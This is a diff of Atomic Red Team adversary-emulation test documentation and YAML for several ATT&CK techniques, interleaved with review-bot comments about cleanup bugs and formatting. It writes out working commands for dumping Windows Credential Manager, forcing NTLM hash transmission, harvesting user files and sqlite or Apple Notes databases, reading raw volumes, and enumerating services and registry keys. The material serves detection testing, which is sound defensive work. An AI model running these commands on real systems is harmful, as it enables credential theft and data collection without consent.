**auto_generated_guid:** 42510244-5019-48fa-a0e5-66c3b76e6049
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
C:\Windows\System32\inetsrv\appcmd.exe list apppool /config
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: IIS must be installed prior to running the test
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if ((Get-WindowsFeature Web-Server).InstallState -eq "Installed") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
Install-WindowsFeature -name Web-Server -IncludeManagementTools
```
### Atomic Test #6: Dump Credential Manager using keymgr.dll and rundll32.exe
<br/>
<br/>
## Atomic Test #6 - Dump Credential Manager using keymgr.dll and rundll32.exe
This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remote control capabilities, enabling RDP, etc.).
Reference: https://twitter.com/0gtweet/status/1415671356239216653
**Supported Platforms:** Windows
**auto_generated_guid:** `84113186-ed3c-4d0d-8a3c-8980c86c1f4a`
#### Attack Commands: Run with `powershell`!
**auto_generated_guid:** 84113186-ed3c-4d0d-8a3c-8980c86c1f4a
#### Attack Commands: Run with `powershell`!
```powershell
rundll32.exe keymgr,KRShowKeyMgr
```
### Atomic Test #7: Send NTLM Hash with RPC Test Connection
<br/>
<br/>
## Atomic Test #7 - Send NTLM Hash with RPC Test Connection
RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.
Ref: https://twitter.com/vysecurity/status/974806438316072960
**Supported Platforms:** Windows
**auto_generated_guid:** `0b207037-813c-4444-ac3f-b597cf280a67`
#### Inputs
**auto_generated_guid:** 0b207037-813c-4444-ac3f-b597cf280a67
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| custom_port | Specify the custom port number | integer | 1234|
| server_ip | Specify the server IP address. If not specified, the loop back IP will be used | string | 127.0.0.1|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null
```
<br/>
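Review bot: the `Get Prereq Commands` for Atomic Tests #4 and #5 run `Install-WindowsFeature -name Web-Server -IncludeManagementTools`, which installs the full IIS role on the host, and neither test has a `Cleanup Commands` section that removes it; document the side effect in the `Dependencies` description or add a cleanup step so a test box is not left running a web server. The description of Atomic Test #6 in the same hunk also needs an editing pass (`allows to export`, `to list the credentials get the passwords`, `can be achieve`).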
+68 -33
@@ -1,36 +1,47 @@
# T1005 - Data from Local System
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1005)
<blockquote>
## Description from ATT&CK
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
> Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
>
> Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
[Source](https://attack.mitre.org/techniques/T1005)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Search files of interest and save them to a single zip file (Windows)](#atomic-test-1-search-files-of-interest-and-save-them-to-a-single-zip-file-windows)
- [Atomic Test #2: Find and dump sqlite databases (Linux)](#atomic-test-2-find-and-dump-sqlite-databases-linux)
- [Atomic Test #3: Copy Apple Notes database files using AppleScript](#atomic-test-3-copy-apple-notes-database-files-using-applescript)
- [Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)](#atomic-test-1---search-files-of-interest-and-save-them-to-a-single-zip-file-windows)
### Atomic Test #1: Search files of interest and save them to a single zip file (Windows)
- [Atomic Test #2 - Find and dump sqlite databases (Linux)](#atomic-test-2---find-and-dump-sqlite-databases-linux)
- [Atomic Test #3 - Copy Apple Notes database files using AppleScript](#atomic-test-3---copy-apple-notes-database-files-using-applescript)
<br/>
## Atomic Test #1 - Search files of interest and save them to a single zip file (Windows)
This test searches for files of certain extensions and saves them to a single zip file prior to extraction.
**Supported Platforms:** Windows
**auto_generated_guid:** `d3d9af44-b8ad-4375-8b0a-4bff4b7e419c`
#### Inputs
**auto_generated_guid:** d3d9af44-b8ad-4375-8b0a-4bff4b7e419c
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| starting_directory | Path to starting directory for the search | Path | C:&#92;Users|
| output_zip_folder_path | Path to directory for saving the generated zip file | Path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;T1005|
| file_extensions | List of file extensions to be searched and zipped, separated by comma and space | string | .doc, .docx, .txt|
#### Attack Commands: Run with `powershell`!
#### Attack Commands: Run with `powershell`!
```powershell
$startingDirectory = "#{starting_directory}"
@@ -61,26 +72,38 @@ if ($foundFiles.Count -gt 0) {
}
```
#### Cleanup Commands
#### Cleanup Commands:
```powershell
Remove-Item -Path $outputZip\data.zip -Force
```
### Atomic Test #2: Find and dump sqlite databases (Linux)
<br/>
<br/>
## Atomic Test #2 - Find and dump sqlite databases (Linux)
An adversary may know/assume that the user of a system uses sqlite databases which contain interest and sensitive data. In this test we download two databases and a sqlite dump script, then run a find command to find & dump the database content.
**Supported Platforms:** Linux
**auto_generated_guid:** `00cbb875-7ae4-4cf1-b638-e543fd825300`
#### Inputs
**auto_generated_guid:** 00cbb875-7ae4-4cf1-b638-e543fd825300
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url of remote payload | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1005/src|
#### Attack Commands: Run with `bash`!
#### Attack Commands: Run with `bash`!
```bash
cd $HOME
@@ -91,55 +114,67 @@ chmod +x sqlite_dump.sh
find . ! -executable -exec bash -c 'if [[ "$(head -c 15 {} | strings)" == "SQLite format 3" ]]; then echo "{}"; ./sqlite_dump.sh {}; fi' \;
```
#### Cleanup Commands
#### Cleanup Commands:
```bash
rm -f $HOME/.art
rm -f $HOME/gta.db
rm -f $HOME/sqlite_dump.sh
```
#### Dependencies: Run with `bash`!
#### Dependencies: Run with `bash`!
##### Description: Check if running on a Debian based machine.
###### Check Prereq Commands
##### Check Prereq Commands:
```bash
if [ -x "$(command -v sqlite3)" ]; then echo "sqlite3 is installed"; else echo "sqlite3 is NOT installed"; exit 1; fi
if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi
if [ -x "$(command -v strings)" ]; then echo "strings is installed"; else echo "strings is NOT installed"; exit 1; fi
```
###### Get Prereq Commands
##### Get Prereq Commands:
```bash
if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then apt update && apt install -y binutils curl sqlite3; fi
if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then yum update -y && yum install -y binutils curl sqlite-devel; fi
```
### Atomic Test #3: Copy Apple Notes database files using AppleScript
<br/>
<br/>
## Atomic Test #3 - Copy Apple Notes database files using AppleScript
This command will copy Apple Notes database files using AppleScript as seen in Atomic Stealer.
**Supported Platforms:** macOS
**auto_generated_guid:** `cfb6d400-a269-4c06-a347-6d88d584d5f7`
#### Inputs
**auto_generated_guid:** cfb6d400-a269-4c06-a347-6d88d584d5f7
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_path | Specify the path to copy the database files into. | path | /private/tmp|
#### Attack Commands: Run with `sh`!
#### Attack Commands: Run with `sh`!
```sh
osascript -e 'tell application "Finder"' -e 'set destinationFolderPath to POSIX file "#{destination_path}"' -e 'set notesFolderPath to (path to home folder as text) & "Library:Group Containers:group.com.apple.notes:"' -e 'set notesFolder to folder notesFolderPath' -e 'set notesFiles to {file "NoteStore.sqlite", file "NoteStore.sqlite-shm", file "NoteStore.sqlite-wal"} of notesFolder' -e 'repeat with aFile in notesFiles' -e 'duplicate aFile to folder destinationFolderPath with replacing' -e 'end' -e 'end tell'
```
#### Cleanup Commands
#### Cleanup Commands:
```sh
rm "#{destination_path}/NoteStore.sqlite*"
```
<br/>
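Review bot: the `Cleanup Commands` for Atomic Test #3 at the end of this hunk, `rm "#{destination_path}/NoteStore.sqlite*"`, put the glob inside the quotes, so the shell looks for a file literally named `NoteStore.sqlite*` and the copied `NoteStore.sqlite`, `-shm` and `-wal` files are left behind in `#{destination_path}`; move the `*` outside the quotes (`rm "#{destination_path}/NoteStore.sqlite"*`). Earlier in the hunk, the `Dependencies` description for Test #2 says `Check if running on a Debian based machine` while the check commands actually test for `sqlite3`, `curl` and `strings`, and the Get Prereq step also handles RHEL-family systems; the description should match what is checked.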
+24 -10
@@ -1,19 +1,21 @@
# T1006 - Direct Volume Access
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1006)
<blockquote>
## Description from ATT&CK
Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
> Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. (Citation: Hakobyan 2009)
>
> Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
Utilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.(Citation: Github PowerSploit Ninjacopy) Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://attack.mitre.org/software/S0404)) to create shadow copies or backups of data from system volumes.(Citation: LOLBAS Esentutl)
[Source](https://attack.mitre.org/techniques/T1006)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1-read-volume-boot-sector-via-dos-device-path-powershell)
- [Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)](#atomic-test-1---read-volume-boot-sector-via-dos-device-path-powershell)
### Atomic Test #1: Read volume boot sector via DOS device path (PowerShell)
<br/>
## Atomic Test #1 - Read volume boot sector via DOS device path (PowerShell)
This test uses PowerShell to open a handle on the drive volume via the `\\.\` [DOS device path specifier](https://docs.microsoft.com/en-us/dotnet/standard/io/file-path-formats#dos-device-paths) and perform direct access read of the first few bytes of the volume.
On success, a hex dump of the first 11 bytes of the volume is displayed.
@@ -26,15 +28,21 @@ For a NTFS volume, it should correspond to the following sequence ([NTFS partiti
**Supported Platforms:** Windows
**auto_generated_guid:** `88f6327e-51ec-4bbf-b2e8-3fea534eab8b`
#### Inputs
**auto_generated_guid:** 88f6327e-51ec-4bbf-b2e8-3fea534eab8b
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| volume | Drive letter of the volume to access | string | C:|
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```powershell
$buffer = New-Object byte[] 11
@@ -44,3 +52,9 @@ $handle.Close()
Format-Hex -InputObject $buffer
```
<br/>
+78 -97
@@ -1,167 +1,148 @@
# T1007 - System Service Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
<blockquote>
## Description from ATT&CK
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
> Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
>
> Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
[Source](https://attack.mitre.org/techniques/T1007)
</blockquote>
## Atomic Tests
- [Atomic Test #1: System Service Discovery](#atomic-test-1-system-service-discovery)
- [Atomic Test #2: System Service Discovery - net.exe](#atomic-test-2-system-service-discovery---netexe)
- [Atomic Test #3: System Service Discovery - systemctl/service](#atomic-test-3-system-service-discovery---systemctlservice)
- [Atomic Test #4: Get-Service Execution](#atomic-test-4-get-service-execution)
- [Atomic Test #5: System Service Discovery - macOS launchctl](#atomic-test-5-system-service-discovery---macos-launchctl)
- [Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks)](#atomic-test-6-system-service-discovery---windows-scheduled-tasks-schtasks)
- [Atomic Test #7: System Service Discovery - Services Registry Enumeration](#atomic-test-7-system-service-discovery---services-registry-enumeration)
- [Atomic Test #8: System Service Discovery - Linux init scripts](#atomic-test-8-system-service-discovery---linux-init-scripts)
- [Atomic Test #1 - System Service Discovery](#atomic-test-1---system-service-discovery)
### Atomic Test #1: System Service Discovery
- [Atomic Test #2 - System Service Discovery - net.exe](#atomic-test-2---system-service-discovery---netexe)
- [Atomic Test #3 - System Service Discovery - systemctl/service](#atomic-test-3---system-service-discovery---systemctlservice)
- [Atomic Test #4 - Get-Service Execution](#atomic-test-4---get-service-execution)
<br/>
## Atomic Test #1 - System Service Discovery
Identify system services.
Upon successful execution, cmd.exe will execute service commands with expected result to stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `89676ba1-b1f8-47ee-b940-2e1a113ebc71`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 89676ba1-b1f8-47ee-b940-2e1a113ebc71
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
```
### Atomic Test #2: System Service Discovery - net.exe
<br/>
<br/>
## Atomic Test #2 - System Service Discovery - net.exe
Enumerates started system services using net.exe and writes them to a file. This technique has been used by multiple threat actors.
Upon successful execution, net.exe will run from cmd.exe that queries services. Expected output is to a txt file in in the temp directory called service-list.txt.
**Supported Platforms:** Windows
**auto_generated_guid:** `5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3`
#### Inputs
**auto_generated_guid:** 5f864a3f-8ce9-45c0-812c-bdf7d8aeacc3
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path of file to hold net.exe output | path | %temp%&#92;service-list.txt|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
net.exe start >> #{output_file}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del /f /q /s #{output_file} >nul 2>&1
```
### Atomic Test #3: System Service Discovery - systemctl/service
<br/>
<br/>
## Atomic Test #3 - System Service Discovery - systemctl/service
Enumerates system service using systemctl/service
**Supported Platforms:** Linux
**auto_generated_guid:** `f4b26bce-4c2c-46c0-bcc5-fce062d38bef`
#### Attack Commands: Run with `bash`!
**auto_generated_guid:** f4b26bce-4c2c-46c0-bcc5-fce062d38bef
#### Attack Commands: Run with `bash`!
```bash
if [ "$(uname)" = 'FreeBSD' ]; then service -e; else systemctl --type=service; fi;
```
### Atomic Test #4: Get-Service Execution
<br/>
<br/>
## Atomic Test #4 - Get-Service Execution
Executes the Get-Service cmdlet to gather objects representing all services on the local system.
**Supported Platforms:** Windows
**auto_generated_guid:** `51f17016-d8fa-4360-888a-df4bf92c4a04`
#### Attack Commands: Run with `command_prompt`!
**auto_generated_guid:** 51f17016-d8fa-4360-888a-df4bf92c4a04
#### Attack Commands: Run with `command_prompt`!
```cmd
powershell.exe Get-Service
```
### Atomic Test #5: System Service Discovery - macOS launchctl
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
**Supported Platforms:** macOS
**auto_generated_guid:** `9b378962-a75e-4856-b117-2503d6dcebba`
#### Attack Commands: Run with `sh`!
```sh
launchctl list
```
### Atomic Test #6: System Service Discovery - Windows Scheduled Tasks (schtasks)
Enumerates scheduled tasks on Windows using schtasks.exe.
**Supported Platforms:** Windows
**auto_generated_guid:** `7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a`
#### Attack Commands: Run with `command_prompt`!
```cmd
schtasks /query /fo LIST /v
```
### Atomic Test #7: System Service Discovery - Services Registry Enumeration
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
**Supported Platforms:** Windows
**auto_generated_guid:** `d70d82bd-bb00-4837-b146-b40d025551b2`
#### Attack Commands: Run with `powershell`!
```powershell
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
```
### Atomic Test #8: System Service Discovery - Linux init scripts
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
**Supported Platforms:** Linux
**auto_generated_guid:** `8f2a5d2b-4018-46d4-8f3f-0fea53754690`
#### Attack Commands: Run with `sh`!
```sh
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
```
<br/>
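Review bot: in Test #8, `ls -ld /etc/rc*.d` lists the rc*.d directory entries themselves, not the runlevel symlinks inside them, so the output does not deliver what the description promises ("listing ... runlevel symlinks under /etc/init.d and /etc/rc*.d"); use `ls -l /etc/rc*.d` (or `find /etc/rc*.d -type l`) if the symlinks are what the test should enumerate. Test #6 enumerates scheduled tasks with `schtasks /query`, which is task rather than service discovery, so its placement under T1007 should either be justified in the description or the test moved.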
+1 -58
@@ -11,7 +11,7 @@ atomic_tests:
- windows
executor:
command: |
tasklist.exe /svc
tasklist.exe
sc query
sc query state= all
name: command_prompt
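Review bot: the one-line change in this hunk swaps between `tasklist.exe /svc` and `tasklist.exe`; without `/svc`, tasklist lists processes only and shows none of the services hosted in them, which is the service-discovery behaviour this T1007 test exists to exercise, so the `/svc` form is the one to keep.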
@@ -53,60 +53,3 @@ atomic_tests:
executor:
name: command_prompt
command: powershell.exe Get-Service
- name: System Service Discovery - macOS launchctl
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
description: |
Enumerates services on macOS using launchctl. Used by adversaries for
identifying daemons, background services, and persistence mechanisms.
supported_platforms:
- macos
executor:
name: sh
command: launchctl list
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
description: |
Enumerates scheduled tasks on Windows using schtasks.exe.
supported_platforms:
- windows
executor:
name: command_prompt
command: schtasks /query /fo LIST /v
- name: System Service Discovery - Services Registry Enumeration
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
description: |
Enumerates Windows services by reading the Services registry key
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
Manager APIs or CLI tools such as sc.exe or Get-Service.
supported_platforms:
- windows
executor:
name: powershell
command: |
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
ForEach-Object {
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
[PSCustomObject]@{
Name = $_.PSChildName
DisplayName = $p.DisplayName
ImagePath = $p.ImagePath
StartType = $p.Start
}
}
- name: System Service Discovery - Linux init scripts
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
description: |
Enumerates system services by listing SysV init scripts and runlevel
symlinks under /etc/init.d and /etc/rc*.d.
supported_platforms:
- linux
executor:
name: sh
command: |
echo "[*] Listing SysV init scripts (/etc/init.d):"
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
echo
echo "[*] Listing runlevel directories (/etc/rc*.d):"
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
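Review bot: this hunk removes the four tests (macOS launchctl, Windows schtasks, Services registry enumeration, Linux init scripts) from the source YAML, while the rendered T1007.md hunk above carries the same four tests as Atomic Tests #5-#8; the markdown is generated from the YAML, so both files need to land in the same state or the docs will diverge from the source. If the tests are kept, `StartType = $p.Start` in the registry test emits the raw DWORD (0-4); mapping it to Boot/System/Automatic/Manual/Disabled would make the output readable, and `ls -ld /etc/rc*.d` should become `ls -l /etc/rc*.d` so the runlevel symlinks named in the description are actually listed.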
+27 -19
@@ -1,61 +1,69 @@
# T1010 - Application Window Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1010)
<blockquote>
## Description from ATT&CK
Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
> Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)
>
> Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
[Source](https://attack.mitre.org/techniques/T1010)
</blockquote>
## Atomic Tests
- [Atomic Test #1: List Process Main Windows - C# .NET](#atomic-test-1-list-process-main-windows---c-net)
- [Atomic Test #1 - List Process Main Windows - C# .NET](#atomic-test-1---list-process-main-windows---c-net)
### Atomic Test #1: List Process Main Windows - C# .NET
<br/>
## Atomic Test #1 - List Process Main Windows - C# .NET
Compiles and executes C# code to list main window titles associated with each process.
Upon successful execution, powershell will download the .cs from the Atomic Red Team repo, and cmd.exe will compile and execute T1010.exe. Upon T1010.exe execution, expected output will be via stdout.
**Supported Platforms:** Windows
**auto_generated_guid:** `fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4`
#### Inputs
**auto_generated_guid:** fe94a1c3-3e22-4dc9-9fdf-3a8bdbc10dc4
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_source_code | Path to source of C# code | path | PathToAtomicsFolder&#92;T1010&#92;src&#92;T1010.cs|
| output_file_name | Name of output binary | string | %TEMP%&#92;T1010.exe|
#### Attack Commands: Run with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```cmd
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} "#{input_source_code}"
#{output_file_name}
```
#### Cleanup Commands
#### Cleanup Commands:
```cmd
del /f /q /s #{output_file_name} >nul 2>&1
```
#### Dependencies: Run with `powershell`!
#### Dependencies: Run with `powershell`!
##### Description: T1010.cs must exist on disk at specified location (#{input_source_code})
###### Check Prereq Commands
##### Check Prereq Commands:
```powershell
if (Test-Path "#{input_source_code}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "#{input_source_code}") -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1010/src/T1010.cs -OutFile "#{input_source_code}"
```
<br/>
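Review bot: several heading lines appear twice in this hunk with no visible difference (e.g. `#### Attack Commands: Run with `command_prompt`!` and `#### Dependencies: Run with `powershell`!`), which points to a whitespace-only change such as trailing spaces; have the generator strip trailing whitespace so the diff shows only the real convention change (`## Atomic Test #1 - ...` with `<blockquote>` versus `### Atomic Test #1: ...` with `>` quoting). The prereq sub-headings also differ in depth (`######` versus `#####`); pick one level and apply it consistently across the generated files.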
+120 -32
@@ -1,24 +1,31 @@
# T1012 - Query Registry
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1012)
<blockquote>
## Description from ATT&CK
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
> Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
>
> The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
[Source](https://attack.mitre.org/techniques/T1012)
</blockquote>
## Atomic Tests
- [Atomic Test #1: Query Registry](#atomic-test-1-query-registry)
- [Atomic Test #2: Query Registry with Powershell cmdlets](#atomic-test-2-query-registry-with-powershell-cmdlets)
- [Atomic Test #3: Enumerate COM Objects in Registry with Powershell](#atomic-test-3-enumerate-com-objects-in-registry-with-powershell)
- [Atomic Test #4: Reg query for AlwaysInstallElevated status](#atomic-test-4-reg-query-for-alwaysinstallelevated-status)
- [Atomic Test #5: Check Software Inventory Logging (SIL) status via Registry](#atomic-test-5-check-software-inventory-logging-sil-status-via-registry)
- [Atomic Test #6: Inspect SystemStartOptions Value in Registry](#atomic-test-6-inspect-systemstartoptions-value-in-registry)
- [Atomic Test #1 - Query Registry](#atomic-test-1---query-registry)
### Atomic Test #1: Query Registry
- [Atomic Test #2 - Query Registry with Powershell cmdlets](#atomic-test-2---query-registry-with-powershell-cmdlets)
- [Atomic Test #3 - Enumerate COM Objects in Registry with Powershell](#atomic-test-3---enumerate-com-objects-in-registry-with-powershell)
- [Atomic Test #4 - Reg query for AlwaysInstallElevated status](#atomic-test-4---reg-query-for-alwaysinstallelevated-status)
- [Atomic Test #5 - Check Software Inventory Logging (SIL) status via Registry](#atomic-test-5---check-software-inventory-logging-sil-status-via-registry)
- [Atomic Test #6 - Inspect SystemStartOptions Value in Registry](#atomic-test-6---inspect-systemstartoptions-value-in-registry)
<br/>
## Atomic Test #1 - Query Registry
Query Windows Registry.
Upon successful execution, cmd.exe will perform multiple reg queries. Some will succeed and others will fail (dependent upon OS).
References:
@@ -29,9 +36,16 @@ https://www.offensive-security.com/wp-content/uploads/2015/04/wp.Registry_Quick_
**Supported Platforms:** Windows
**auto_generated_guid:** `8f7578c4-9863-4d83-875c-a565573bbdf0`
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 8f7578c4-9863-4d83-875c-a565573bbdf0
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```cmd
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
@@ -58,16 +72,30 @@ reg query "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components"
reg query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Startup"
```
### Atomic Test #2: Query Registry with Powershell cmdlets
<br/>
<br/>
## Atomic Test #2 - Query Registry with Powershell cmdlets
Query Windows Registry with Powershell cmdlets, i.e., Get-Item and Get-ChildItem. The results from above can also be achieved with Get-Item and Get-ChildItem.
Unlike using "reg query" which then executes reg.exe, using cmdlets won't generate new processes, which may evade detection systems monitoring process generation.
**Supported Platforms:** Windows
**auto_generated_guid:** `0434d081-bb32-42ce-bcbb-3548e4f2628f`
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
**auto_generated_guid:** 0434d081-bb32-42ce-bcbb-3548e4f2628f
